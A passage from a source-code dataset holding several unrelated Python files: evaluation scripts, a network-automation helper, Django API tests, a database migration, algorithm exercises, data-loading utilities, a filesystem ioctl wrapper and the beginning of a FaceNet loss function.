baselines.checkpoint('%s.%s.heatmaps'%(args.load, args.dset)),\n        # 'img2heatmap': baselines.checkpoint('data/%s/output/img2heatmap.pth'%(args.dset)),\n    }\n    if args.dset=='opra':\n        predictions.update({\n            # 'demo2vec': baselines.checkpoint('data/opra/output/d2v.pth'),\n        })\n\n    for method in predictions:\n        print (method)\n        heatmaps = predictions[method]\n        scores = heval.evaluate(heatmaps)\n\n","repo_name":"Tushar-N/interaction-hotspots","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"}{"seq_id":"39599866945","text":"frase = str(input('Digite uma frase qualquer: ').upper())\r\nespaco = frase.strip() # tira os espacos do final e do começo\r\ndiv = espaco.split() # faz divisao a cada espaco\r\njunto = ''.join(div) # junta a divisao com um termo entre: ''\r\ninverso = ''\r\ninverso = junto[::-1]\r\n'''for c in range(len(junto)-1, -1, -1):\r\n    inverso += junto[c]'''\r\nprint('O inverso de {} é {}'.format(junto, inverso))\r\nif junto == inverso:\r\n    print('A frase digitada é um palindromo!')\r\nelse:\r\n    print('A frase digitada não é um palindromo!')\r\n\r\n","repo_name":"GabsOrtega/logica-python","sub_path":"exercicios_python/Exercicio_053.py","file_name":"Exercicio_053.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}{"seq_id":"43188039120","text":"import os\nfrom dataclasses import dataclass\nfrom functools import lru_cache\nfrom typing import List, Optional, Tuple, Union\n\nfrom jinja2 import Environment as JinjaEnvironment\nfrom jinja2 import FileSystemLoader\nfrom netutils.utils import jinja2_convenience_function\nfrom nornir import InitNornir\nfrom nornir.core import Nornir\nfrom nornir.core.filter import F\nfrom nornir.core.plugins.inventory import InventoryPluginRegister\nfrom nornir.core.task import AggregatedResult, MultiResult\n\nfrom cnaas_nms.devicehandler.nornir_plugins.cnaas_inventory import CnaasInventory\nfrom cnaas_nms.scheduler.jobresult import JobResult\nfrom cnaas_nms.tools import jinja_filters\n\n\n@dataclass\nclass NornirJobResult(JobResult):\n    nrresult: Optional[MultiResult] = None\n    change_score: Optional[float] = None\n\n\nclass RelativeJinjaEnvironment(JinjaEnvironment):\n    \"\"\"Enable relative template paths\"\"\"\n\n    def join_path(self, template, parent):\n        return os.path.join(os.path.dirname(parent), template)\n\n\n@lru_cache(maxsize=8)\ndef get_jinja_env(path):\n    jinja_env = RelativeJinjaEnvironment(\n        trim_blocks=True,\n        lstrip_blocks=True,\n        keep_trailing_newline=True,\n        loader=FileSystemLoader(path),\n        cache_size=0,\n    )\n    jinja_env.filters.update(jinja_filters.FILTERS)\n    jinja_env.filters.update(jinja2_convenience_function())\n    return jinja_env\n\n\ndef cnaas_init() -> Nornir:\n    InventoryPluginRegister.register(\"CnaasInventory\", CnaasInventory)\n    nr = InitNornir(\n        runner={\"plugin\": \"threaded\", \"options\": {\"num_workers\": 50}},\n        inventory={\"plugin\": \"CnaasInventory\"},\n        logging={\"log_file\": \"/tmp/nornir-pid{}.log\".format(os.getpid()), \"level\": \"DEBUG\"},\n    )\n    return nr\n\n\ndef nr_result_serialize(result: AggregatedResult):\n    if not isinstance(result, AggregatedResult):\n        raise ValueError(\"result must be of type AggregatedResult\")\n\n    hosts = {}\n    for host, multires in result.items():\n        hosts[host] = {\"failed\": False, \"job_tasks\": []}\n        for res in multires:\n            hosts[host][\"job_tasks\"].append(\n                
{\"task_name\": res.name, \"result\": res.result, \"diff\": res.diff, \"failed\": res.failed}\n            )\n            if res.failed:\n                hosts[host][\"failed\"] = True\n    return hosts\n\n\ndef inventory_selector(\n    nr: Nornir,\n    resync: bool = True,\n    hostname: Optional[Union[str, List[str]]] = None,\n    device_type: Optional[str] = None,\n    group: Optional[str] = None,\n) -> Tuple[Nornir, int, List[str]]:\n    \"\"\"Return a filtered Nornir inventory with only the selected devices\n\n    Args:\n        nr: Nornir object\n        resync: Set to false if you want to filter out devices that are synchronized\n        hostname: Select device by hostname (string) or list of hostnames (list)\n        device_type: Select device by device_type (string)\n        group: Select device by group (string)\n\n    Returns:\n        Tuple with: filtered Nornir inventory, total device count selected,\n        list of hostnames that were skipped because of resync=False\n    \"\"\"\n    skipped_devices = []\n    if hostname:\n        if isinstance(hostname, str):\n            nr_filtered = nr.filter(name=hostname).filter(managed=True)\n        elif isinstance(hostname, list):\n            nr_filtered = nr.filter(filter_func=lambda h: h.name in hostname).filter(managed=True)\n        else:\n            raise ValueError(\"Can't select hostname based on type {}\".format(type(hostname)))\n    elif device_type:\n        nr_filtered = nr.filter(F(groups__contains=\"T_\" + device_type)).filter(managed=True)\n    elif group:\n        nr_filtered = nr.filter(F(groups__contains=group)).filter(managed=True)\n    else:\n        # all devices\n        nr_filtered = nr.filter(managed=True)\n\n    if resync or hostname:\n        return nr_filtered, len(nr_filtered.inventory.hosts), skipped_devices\n    else:\n        pre_device_list = list(nr_filtered.inventory.hosts.keys())\n        nr_filtered = nr_filtered.filter(synchronized=False)\n        post_device_list = list(nr_filtered.inventory.hosts.keys())\n        skipped_devices = [x for x in pre_device_list if x not in post_device_list]\n        return nr_filtered, len(post_device_list), skipped_devices\n","repo_name":"SUNET/cnaas-nms","sub_path":"src/cnaas_nms/devicehandler/nornir_helper.py","file_name":"nornir_helper.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"18"}{"seq_id":"73754230761","text":"#https://leetcode.com/problems/valid-triangle-number/\n#Given an integer array nums, return the number of triplets chosen from the array that can make triangles if we take them as side lengths of a triangle.\n# \n#Example 1:\n#Input: nums = [2,2,3,4]\n#Output: 3\n#Explanation: Valid combinations are: \n#2,3,4 (using the first 2)\n#2,3,4 (using the second 2)\n#2,2,3\n#Example 2:\n#Input: nums = [4,2,3,4]\n#Output: 4\n# \n#Constraints:\n#\t1 <= nums.length <= 1000\n#\t0 <= nums[i] <= 1000\nclass Solution(object):\n    def triangleNumber(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        #Solution\n        #1. Sort nums in ascending order\n        #2. For every triplet (i, j, k) with i < j < k, test the triangle inequality\n        #3. After sorting, checking nums[i] + nums[j] > nums[k] is enough, since nums[k] is the longest side\n        #4. 
Count the triplets that pass the check and return the count\n        #\n        #Example:\n        #nums: [2,2,3,4]\n        #ret: 3\n        #\n        #Time complexity: O(n^3), brute force over all triplets\n        #Space complexity: O(1)\n\n        ret = 0\n        nums.sort()\n        for i in range(len(nums)):\n            for j in range(i + 1, len(nums)):\n                for k in range(j + 1, len(nums)):\n                    if nums[i] + nums[j] > nums[k]:\n                        ret += 1\n\n        return ret","repo_name":"Wang-dongyu123/CopilotCodeQuality","sub_path":"output/python/Medium/882-valid-triangle-number.py","file_name":"882-valid-triangle-number.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}{"seq_id":"22815372537","text":"# -*- coding: utf-8 -*-\nfrom unittest import mock\n\nimport pytest\n\nfrom paas_wl.release_controller.hooks.models import Command\nfrom paas_wl.utils.constants import CommandStatus, CommandType\n\npytestmark = pytest.mark.django_db\n\n\nclass TestCommandViewSet:\n    @pytest.fixture()\n    def hook_maker(self, fake_app, fake_simple_build, bk_user):\n        def core(command: str) -> Command:\n            return fake_app.command_set.new(\n                type_=CommandType.PRE_RELEASE_HOOK,\n                operator=bk_user.username,\n                build=fake_simple_build,\n                command=command,\n            )\n\n        return core\n\n    def test_create(self, api_client, fake_app, fake_simple_build, settings):\n        url = f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}/apps/{fake_app.name}/commands/\"\n        data = {\n            \"type\": \"pre-release-hook\",\n            \"command\": \"echo 1;\",\n            \"build\": fake_simple_build.uuid,\n            \"operator\": \"nobody\",\n        }\n        with mock.patch(\"paas_wl.resources.tasks.run_command\") as run_command:\n            resp = api_client.post(url, data=data)\n\n        assert run_command.delay.called\n        assert resp.status_code == 201\n\n        pk = resp.json()[\"uuid\"]\n        assert Command.objects.get(pk=pk)\n\n    def test_retrieve(self, api_client, fake_app, hook_maker, settings):\n        command = hook_maker(\"echo 1;\")\n        url = f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}/apps/{fake_app.name}/commands/{command.uuid}\"\n        resp = api_client.get(url)\n\n        assert resp.status_code == 200\n        assert resp.json()[\"uuid\"] == str(command.uuid)\n\n    @pytest.mark.parametrize(\n        \"status, expected\",\n        [\n            (CommandStatus.FAILED, 400),\n            (CommandStatus.SUCCESSFUL, 400),\n            (CommandStatus.INTERRUPTED, 400),\n            (CommandStatus.SCHEDULED, 200),\n            (CommandStatus.PENDING, 200),\n        ],\n    )\n    def test_interrupt_command_x_status(self, api_client, fake_app, hook_maker, settings, status, expected):\n        command = hook_maker(\"echo 1;\")\n        command.set_logs_was_ready()\n        command.update_status(status)\n\n        url = (\n            f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}\"\n            f\"/apps/{fake_app.name}/commands/{command.uuid}/interruptions\"\n        )\n\n        with mock.patch(\"paas_wl.resources.base.controllers.CommandHandler.interrupt_command\"):\n            resp = api_client.post(url)\n\n        assert resp.status_code == expected\n\n    def test_interrupt_command_failed(self, api_client, fake_app, hook_maker, settings):\n        command = hook_maker(\"echo 1;\")\n        command.set_logs_was_ready()\n        command.update_status(CommandStatus.SCHEDULED)\n\n        url = (\n            f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}\"\n            f\"/apps/{fake_app.name}/commands/{command.uuid}/interruptions\"\n        )\n\n        with mock.patch(\n            \"paas_wl.resources.base.controllers.CommandHandler.interrupt_command\",\n            mock.MagicMock(return_value=False),\n        ):\n            resp = api_client.post(url)\n\n        assert resp.status_code == 400\n        assert resp.json() == {'code': 'INTERRUPTION_FAILED', 'detail': '中断失败: 
指令可能已执行完毕.'}\n","repo_name":"leafage-collb/bk-paas","sub_path":"workloads/paas_wl/tests/api/system_api/test_command.py","file_name":"test_command.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"13064017556","text":"\"\"\"Revise security group rules\n\nRevision ID: 26e984b48a0d\nRevises: 1664300cb03a\nCreate Date: 2014-09-16 22:01:07.329380\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '26e984b48a0d'\ndown_revision = '1664300cb03a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\nOLD_TABLE = \"quark_security_group_rule\"\nNEW_TABLE = \"quark_security_group_rules\"\n\n\ndef upgrade():\n # NOTE(mdietz): You can't change the datatype or remove columns,\n # in SQLite, please see\n # http://sqlite.org/lang_altertable.html\n op.drop_table(OLD_TABLE)\n op.create_table(\n NEW_TABLE,\n sa.Column('tenant_id', sa.String(length=255), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.String(length=36), nullable=False),\n sa.Column('group_id', sa.String(length=36), nullable=False),\n sa.Column('direction', sa.String(length=10), nullable=False),\n sa.Column('port_range_max', sa.Integer(), nullable=True),\n sa.Column('port_range_min', sa.Integer(), nullable=True),\n sa.Column('protocol', sa.Integer(), nullable=True),\n sa.Column(\"ethertype\", type_=sa.Integer(), nullable=False),\n sa.Column('remote_group_id', sa.String(length=36), nullable=True),\n sa.Column(\"remote_ip_prefix\", type_=sa.String(255)),\n sa.ForeignKeyConstraint([\"remote_group_id\"],\n [\"quark_security_groups.id\"],\n \"fk_remote_group_id\"),\n sa.ForeignKeyConstraint(['group_id'], ['quark_security_groups.id'], ),\n sa.PrimaryKeyConstraint('id'),\n mysql_engine=\"InnoDB\")\n\n\ndef downgrade():\n op.drop_table(NEW_TABLE)\n op.create_table(\n OLD_TABLE,\n sa.Column('tenant_id', sa.String(length=255), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.String(length=36), nullable=False),\n sa.Column('group_id', sa.String(length=36), nullable=False),\n sa.Column('direction', sa.String(length=10), nullable=False),\n sa.Column('ethertype', sa.String(length=4), nullable=False),\n sa.Column('port_range_max', sa.Integer(), nullable=True),\n sa.Column('port_range_min', sa.Integer(), nullable=True),\n sa.Column('protocol', sa.Integer(), nullable=True),\n sa.Column('remote_ip_prefix', sa.String(length=22), nullable=True),\n sa.Column('remote_group_id', sa.String(length=36), nullable=True),\n sa.ForeignKeyConstraint(['group_id'], ['quark_security_groups.id'], ),\n sa.PrimaryKeyConstraint('id'),\n mysql_engine='InnoDB')\n","repo_name":"MichaelPorras/quark","sub_path":"quark/db/migration/alembic/versions/26e984b48a0d_revise_security_group_rules.py","file_name":"26e984b48a0d_revise_security_group_rules.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"37302362084","text":"n = int(input())\n\nclass FenwickTree:\n def __init__(self, x):\n self.bit = x\n for i in range(len(x)):\n j = i | (i + 1)\n if j < len(x):\n x[j] = max(x[j], x[i])\n\n def update(self, idx, x):\n while idx < len(self.bit):\n self.bit[idx] = max(self.bit[idx], x)\n idx |= idx + 1\n\n def query(self, end):\n x = float('-inf')\n while end:\n x = max(x, self.bit[end - 1])\n end &= end - 1\n return x\n\nboxes = []\n\nmp = {}\n\nfor _ in range(n):\n a, b, c = map(int, input().split())\n 
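# register every side length so the coordinate-compression pass below can index it\n    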
mp[a] = mp[b] = mp[c] = 0\n    boxes.append(tuple(sorted([a, b, c])))\n\nfor i, el in enumerate(sorted(mp)):\n    mp[el] = i\n\nboxes = [(mp[b[0]], mp[b[1]], mp[b[2]]) for b in boxes]\n\nboxes.sort()\n\nj = n - 1\n\nfw = FenwickTree([float('-inf')] * (len(mp) + 1))\n\nfound = False\n\nfor i in range(n - 1, -1, -1):\n    while j > i and boxes[j][0] > boxes[i][0]:\n        fw.update(len(mp) - boxes[j][1] - 1, boxes[j][2])\n        j -= 1\n    if fw.query(len(mp) - boxes[i][1] - 1) > boxes[i][2]:\n        found = True\n        break\n    \nprint(\"Yes\" if found else \"No\")","repo_name":"theabbie/leetcode","sub_path":"miscellaneous/F_Box_in_Box.py","file_name":"F_Box_in_Box.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} {"seq_id":"41246921764","text":"class Node(object):\n    def __init__(self,sName):\n        self._lChildren = []\n        self.sName = sName\n    def __repr__(self):\n        return \"<Node: {}>\".format(self.sName)\n    def append(self,*args,**kwargs):\n        self._lChildren.append(*args,**kwargs)\n    def print_all_1(self):\n        print(self)\n        for oChild in self._lChildren:\n            oChild.print_all_1()\n    def print_all_2(self):\n        def gen(o):\n            print(\"o={} \".format(o), end='')\n            lAll = [o,]\n            print(\"lAll={} \".format(lAll), end='')\n            while lAll:\n                oNext = lAll.pop(0)\n                print(\"\\n\\tlAll={} \".format(lAll), end='')\n                print(\"\\n\\toNext={}\".format(oNext), end='')\n                lAll.extend(oNext._lChildren)\n                print(\"\\n\\tlAll={} \".format(lAll), end='')\n                yield oNext \n        for oNode in gen(self):\n            print(\"\")\n            print(oNode)\n\noRoot = Node(\"root\")\noChild1 = Node(\"child1\")\noChild2 = Node(\"child2\")\noChild3 = Node(\"child3\")\noChild4 = Node(\"child4\")\noChild5 = Node(\"child5\")\noChild6 = Node(\"child6\")\noChild7 = Node(\"child7\")\noChild8 = Node(\"child8\")\noChild9 = Node(\"child9\")\noChild10 = Node(\"child10\")\n\noRoot.append(oChild1)\noRoot.append(oChild2)\noRoot.append(oChild3)\noChild1.append(oChild4)\noChild1.append(oChild5)\noChild2.append(oChild6)\noChild4.append(oChild7)\noChild3.append(oChild8)\noChild3.append(oChild9)\noChild6.append(oChild10)\n\n# specify output from here onwards\n\nprint(\"oRoot.print_all_1()\")\noRoot.print_all_1()\n\nprint(\"oRoot.print_all_2()\")\noRoot.print_all_2()","repo_name":"jsaylor525/puzzle-solutions","sub_path":"python_coding_examples/question_11.py","file_name":"question_11.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} {"seq_id":"70535354338","text":"# encoding = utf-8\n# author = xy\n\nfrom data_pre import wfqd\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils import data\nimport utils\nimport pickle\n\n\ndef load_w2v(embedding_path):\n    \"\"\" load embedding vector \"\"\"\n    embedding_np = np.load(embedding_path)\n    return embedding_np\n\n\ndef load_data(df_file, vocab_path, q_max_len=30, p_max_len=500, a_max_len=5):\n    \"\"\"\n    load data from .csv\n    # 1. load\n    # 2. index, POS tag, whether the word appears in the answer, whether it is a title\n    # 3. 
padding\n    return: content, question, zhengli, fuli, wfqd, answer\n    \"\"\"\n\n    # load\n    df = pd.read_csv(df_file)\n    querys = df['query'].values.tolist()\n    passages = df['passage'].values.tolist()\n    zhenglis = df['zhengli'].values.tolist()\n    fulis = df['fuli'].values.tolist()\n    wfqds = df['wfqd'].values.tolist()\n    wfqd_list = wfqd.wfqd_list\n\n    if 'answer' in df:\n        answers = df['answer'].values.tolist()\n        answers_tmp = []\n        for answer, zhengli, fuli in zip(answers, zhenglis, fulis):\n            if answer.strip() == zhengli:\n                answers_tmp.append(0)\n            elif answer.strip() == fuli:\n                answers_tmp.append(1)\n            elif answer.strip() in wfqd_list:\n                answers_tmp.append(2)\n            else:\n                print('load_data, meet wrong data, answer:%s, zhengli:%s, fuli:%s' % (answer, zhengli, fuli))\n\n    # words\n    p_index = [utils.split_word(pp) for pp in passages]\n    q_index = [utils.split_word(qq) for qq in querys]\n    zhengli_index = [utils.split_word(zhengli) for zhengli in zhenglis]\n    fuli_index = [utils.split_word(fuli) for fuli in fulis]\n    wfqd_index = [utils.split_word(w) for w in wfqds]\n\n    # words -> index\n    q_index = utils.words2index(q_index, vocab_path)\n    p_index = utils.words2index(p_index, vocab_path)\n    zhengli_index = utils.words2index(zhengli_index, vocab_path)\n    fuli_index = utils.words2index(fuli_index, vocab_path)\n    wfqd_index = utils.words2index(wfqd_index, vocab_path)\n\n    # padding\n    q_index = utils.pad(q_index, q_max_len)\n    p_index = utils.pad(p_index, p_max_len)\n    zhengli_index = utils.pad(zhengli_index, a_max_len)\n    fuli_index = utils.pad(fuli_index, a_max_len)\n    wfqd_index = utils.pad(wfqd_index, a_max_len)\n\n    if 'answer' in df:\n        return [p_index, q_index, zhengli_index, fuli_index, wfqd_index, answers_tmp]\n    else:\n        return [p_index, q_index, zhengli_index, fuli_index, wfqd_index]\n\n\ndef build_loader(dataset, batch_size, shuffle, drop_last):\n    \"\"\"\n    build data loader\n    return: an instance of DataLoader\n    \"\"\"\n    # dataset = [torch.LongTensor(d) for d in dataset]\n    # dataset = data.TensorDataset(*dataset)\n    data_iter = data.DataLoader(\n        dataset=dataset,\n        batch_size=batch_size,\n        shuffle=shuffle,\n        drop_last=drop_last\n    )\n    return data_iter\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xy09Player/rd_opinion","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"1753151760","text":"import pandas as pd\n\ndf = pd.read_csv('dirtydata.csv')\n\ndf.loc[7,'Duration'] = 45\nprint(df.to_string())\n\n\n#Loop through all values in the \"Duration\" column.\nfor x in df.index:\n    if df.loc[x, \"Duration\"] > 120:\n        df.loc[x, \"Duration\"] = 120\n\nprint(df.to_string())\n\n###Removing Rows\nfor x in df.index:\n    if df.loc[x, \"Duration\"] > 120:\n        df.drop(x, inplace = True)\n\n#remember to include the 'inplace = True' argument to make the changes in the original DataFrame object instead of returning a copy\n\nprint(df.to_string())\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sayeed007/PythonProgramming","sub_path":"Pandas/9_Fixing Wrong Data.py","file_name":"9_Fixing Wrong Data.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"17935134591","text":"from rest_framework.renderers import BaseRenderer, JSONRenderer\nfrom xmltodict import unparse\nfrom .encoders import MongoJsonEncoder\n\n\nclass PlainTextRenderer(BaseRenderer):\n    media_type = 'text/plain'\n    format = 'txt'\n\n    def 
render(self, data, media_type=None, renderer_context=None):\n return str(data).encode(self.charset)\n\n\nclass XMLRenderer(BaseRenderer):\n \"\"\"\n Renderer which serializes to XML.\n \"\"\"\n media_type = 'application/xml'\n format = 'xml'\n root = 'xml'\n\n def render(self, data, accepted_media_type=None, renderer_context=None):\n \"\"\"\n Renders *obj* into serialized XML.\n \"\"\"\n if self.root:\n data = {self.root: data}\n return unparse(data).encode(self.charset)\n\n\nclass BareXMLRenderer(XMLRenderer):\n root = None\n\n\nclass MongoJsonRenderer(JSONRenderer):\n encoder_class = MongoJsonEncoder\n","repo_name":"John-yingqiang/temp","sub_path":"common/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70817640737","text":"import struct\nimport collections\nimport ioctl\nimport fcntl\nimport array\n\n# Derived from linux/fsmap.h\n_struct_fsmap_string = 'LLQQQQQQQ'\n_struct_fsmap = struct.Struct('=' + _struct_fsmap_string)\n_struct_fsmap_head_string = 'LLLLQQQQQQ' + (2 * _struct_fsmap_string)\n_struct_fsmap_head = struct.Struct('=' + _struct_fsmap_head_string)\n\nFMH_IF_VALID = 0\nFMH_OF_DEV_T = 0x1\n\nFMR_OF_PREALLOC = 0x1\nFMR_OF_ATTR_FORK = 0x2\nFMR_OF_EXTENT_MAP = 0x4\nFMR_OF_SHARED = 0x8\nFMR_OF_SPECIAL_OWNER = 0x10\nFMR_OF_LAST = 0x20\n\ndef FMR_OWNER(fstype, code):\n\treturn (fstype << 32) | (code & 0xFFFFFFFF)\ndef FMR_OWNER_TYPE(owner):\n\treturn owner >> 32\ndef FMR_OWNER_CODE(owner):\n\treturn owner & 0xFFFFFFFF\n\nFMR_OWN_FREE = FMR_OWNER(0, 1)\nFMR_OWN_UNKNOWN = FMR_OWNER(0, 2)\nFMR_OWN_METADATA = FMR_OWNER(0, 3)\n\n_FS_IOC_GETFSMAP = ioctl._IOWR(ord('X'), 59, _struct_fsmap_head)\n\nfsmap_key = collections.namedtuple('fsmap_key',\n\t\t'device flags physical owner offset')\nfsmap_rec = collections.namedtuple('fsmap_rec',\n\t\t'device flags physical owner offset length hdr_flags')\n\ndef getfsmap(fd, getfsmap_keys = None, count = 10000):\n\t'''Iterable GETFSMAP generator...'''\n\tlength = 0\n\n\t# Prepare keys\n\ttry:\n\t\tkey0 = getfsmap_keys[0]\n\texcept:\n\t\tkey0 = fsmap_key(0, 0, 0, 0, 0)\n\ttry:\n\t\tkey1 = getfsmap_keys[1]\n\texcept:\n\t\tkey1 = fsmap_key(ioctl._UINT32_MAX, ioctl._UINT32_MAX, \\\n\t\t\t\tioctl._UINT64_MAX, ioctl._UINT64_MAX, \\\n\t\t\t\tioctl._UINT64_MAX)\n\n\twhile True:\n\t\thdr = _struct_fsmap_head.pack(0, 0, count, 0, 0, 0, 0, 0, 0, 0, \\\n\t\t\t\tkey0.device, key0.flags, key0.physical, \\\n\t\t\t\tkey0.owner, key0.offset, length, 0, 0, 0, \\\n\t\t\t\tkey1.device, key1.flags, key1.physical, \\\n\t\t\t\tkey1.owner, key1.offset, 0, 0, 0, 0)\n\t\tbuf = bytearray(hdr) + bytearray(_struct_fsmap.size * count)\n\t\ttry:\n\t\t\tret = fcntl.ioctl(fd, _FS_IOC_GETFSMAP, buf)\n\t\texcept TypeError:\n\t\t\t# Turn into mutable C-level array of chars\n\t\t\ts = '%s%s' % (hdr, '\\0' * (_struct_fsmap.size * count))\n\t\t\tbuf = array.array('c', s)\n\t\t\tret = fcntl.ioctl(fd, _FS_IOC_GETFSMAP, buf)\n\t\tif ret < 0:\n\t\t\traise IOError('GETFSMAP')\n\n\t\tmeh = _struct_fsmap_head.unpack_from(buf)\n\t\toflags = meh[1]\n\t\tentries = meh[3]\n\t\tif entries == 0:\n\t\t\treturn\n\n\t\tbufsz = _struct_fsmap_head.size + (_struct_fsmap.size * entries)\n\t\tassert len(buf) >= bufsz\n\t\tfor offset in range(_struct_fsmap_head.size, bufsz, _struct_fsmap.size):\n\t\t\tx = _struct_fsmap.unpack_from(buf, offset)\n\t\t\trec = fsmap_rec(x[0], x[1], x[2], x[3], x[4], x[5], oflags)\n\t\t\tyield rec\n\n\t\tif rec.flags & 
FMR_OF_LAST:\n\t\t\treturn\n\t\tkey0 = rec\n\t\tlength = rec.length\n\nXFS_FMR_OWN_TYPE\t= ord('X')\nXFS_FMR_OWN_FS\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 1)\nXFS_FMR_OWN_LOG\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 2)\nXFS_FMR_OWN_AG\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 3)\nXFS_FMR_OWN_INOBT\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 4)\nXFS_FMR_OWN_INODES\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 5)\nXFS_FMR_OWN_REFC\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 6)\nXFS_FMR_OWN_COW\t\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 7)\nXFS_FMR_OWN_DEFECTIVE\t= FMR_OWNER(XFS_FMR_OWN_TYPE, 8)\n\nEXT4_FMR_OWN_TYPE\t= ord('f')\nEXT4_FMR_OWN_GDT\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 1)\nEXT4_FMR_OWN_RESV_GDT\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 2)\nEXT4_FMR_OWN_BLKBM\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 3)\nEXT4_FMR_OWN_INOBM\t= FMR_OWNER(EXT4_FMR_OWN_TYPE, 4)\n\nspecial_owner_types = {\n\tXFS_FMR_OWN_TYPE:\t'xfs',\n\tEXT4_FMR_OWN_TYPE:\t'ext4',\n}\n\nspecial_owner_codes = {\n\tXFS_FMR_OWN_FS:\t\t'fsdata',\n\tXFS_FMR_OWN_LOG:\t'log',\n\tXFS_FMR_OWN_AG:\t\t'bnobt-cntbt-rmapbt',\n\tXFS_FMR_OWN_INOBT:\t'inobt',\n\tXFS_FMR_OWN_INODES:\t'inodes',\n\tXFS_FMR_OWN_REFC:\t'refcountbt',\n\tXFS_FMR_OWN_COW:\t'cow',\n\tXFS_FMR_OWN_DEFECTIVE:\t'defective',\n\tEXT4_FMR_OWN_GDT:\t'group_descriptors',\n\tEXT4_FMR_OWN_RESV_GDT:\t'reserved_gdt_blocks',\n\tEXT4_FMR_OWN_BLKBM:\t'block_bitmap',\n\tEXT4_FMR_OWN_INOBM:\t'inode_bitmap',\n}\n\ndef special_owner_name(owner):\n\t'''Formulate a name for a special owner.'''\n\tt = FMR_OWNER_TYPE(owner)\n\tc = FMR_OWNER_CODE(owner)\n\tif owner in special_owner_codes:\n\t\treturn '%s:%s' % (special_owner_types[t], \\\n\t\t\t\tspecial_owner_codes[owner])\n\treturn '%d:%d' % (t, c)\n\nif __name__ == '__main__':\n\timport sys\n\timport pprint\n\n\tif len(sys.argv) < 2:\n\t\tsys.stderr.write('No filename(s) given\\n')\n\t\tsys.exit(1)\n\n\tfor file_ in sys.argv[1:]:\n\t\twith open(file_, 'r') as fd:\n\t\t\tfor fmr in getfsmap(fd):\n\t\t\t\tpprint.pprint(fmr)\n","repo_name":"djwong/filemapper","sub_path":"getfsmap.py","file_name":"getfsmap.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"28613899319","text":"# -*- coding: utf-8 -*-\n\"\"\"\n简介:\n实现人脸识别经典算法FaceNet\n\nCreated on Fri Nov 16 14:59:31 2018\n\n@author: dell\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.layers import BatchNormalization, MaxPooling2D, AveragePooling2D\nfrom keras.layers import Dense, Flatten, Lambda, Concatenate\nfrom keras.models import Model\nfrom keras.initializers import glorot_uniform\nfrom keras.engine.topology import Layer\nfrom keras import backend as K\nimport fr_utils\nfrom inception_blocks_v2 import *\n\nK.set_image_data_format('channels_first')\n\nimport time\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom numpy import genfromtxt\n\n\ndef triplet_loss(y_true, y_pred, alpha=0.2):\n '''\n 实现FaceNet中的损失函数\n Parameters:\n y_true - true标签,\n y_pred - 列表,包含了以下参数:\n anchor - 给定的anchor图像的编码,shape=(None, 128)\n positive - positive图像的编码, shape=(None, 128)\n negative - negative图像的编码, shape=(None, 128)\n alpha - 超参数\n Returns:\n loss - 实数, 损失函数的值\n '''\n \n # step1 获取anchor, positive, negative的图像编码\n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\n \n # step2 计算anchor与positive之间的编码距离\n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1) # 注意这里按列求和\n \n # step3 计算anchor与negative之间的编码距离\n neg_dist = 
